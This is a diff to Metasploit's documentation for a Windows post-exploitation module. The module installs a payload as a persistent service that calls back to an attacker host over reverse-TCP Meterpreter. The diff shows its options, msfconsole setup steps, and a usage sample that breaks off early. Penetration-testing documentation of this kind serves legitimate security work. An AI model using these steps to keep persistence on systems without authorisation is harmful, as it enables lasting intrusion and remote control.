rapid7/metasploit-framework/documentation/modules/post/windows/manage/persistence_service.md

 ## Overview

-This Module will generate and upload an executable to a remote host and make it persistent service.
+This Module will generate and upload an executable to a remote host, next will make it a persistent service.
 It will create a new service which will start the payload whenever the service is running.
-Privilege is required.
+Admin or system privilege is required.

 ## Module Options

+**LHOST**

-LHOST  IP of host that will receive the connection from the payload.
+IP of host that will receive the connection from the payload.

+**LPORT**

-LPORT  Port for Payload to connect to.
+Port for Payload to connect to.
+Default: `4433`

+**OPTIONS**

-OPTIONS Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
+Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
+For example: 'AutoLoadStdapi=false,StagerRetryCount=20'

+**PAYLOAD**

-PAYLOAD The payload to use in the service.
+The payload to use in the service.
+Default: `windows/meterpreter/reverse_tcp`
-SESSION The session to run this module on.

-RetryTime The retry time that shell connect failed.
-5 seconds as default.
-RemoteExePath  The remote victim exe path to run.
-Use temp directory as default.
-RemoteExeName  The remote victim name.
-Random string as default.
-ServiceName    The name of service.
-Random string as default.'
-ServiceDescription The description of service.
-Random string as default.
+**HANDLER**

+Start an exploit/multi/handler to receive the connection.

 ## Verification steps

-* get session on target
+  1. get session on target
-* `use post/windows/manage/persistence_service`
+  2. `use post/windows/manage/persistence_service`
-* `set payload <payload>`
+  3. `set payload <payload>`
-* `set lport <lport>`
+  4. `set lport <lport>`
-* `set lhost <lhost>`
+  5. `set lhost <lhost>`
-* `set handler true`
+  6. `set handler true`
-* `run`
+  7. `run`

 ## Usage

+### Windows 7 sp1 x64
 ```
 msf5 post(windows/manage/persistence_service) > sessions -i 1
 [*] Starting interaction with 1...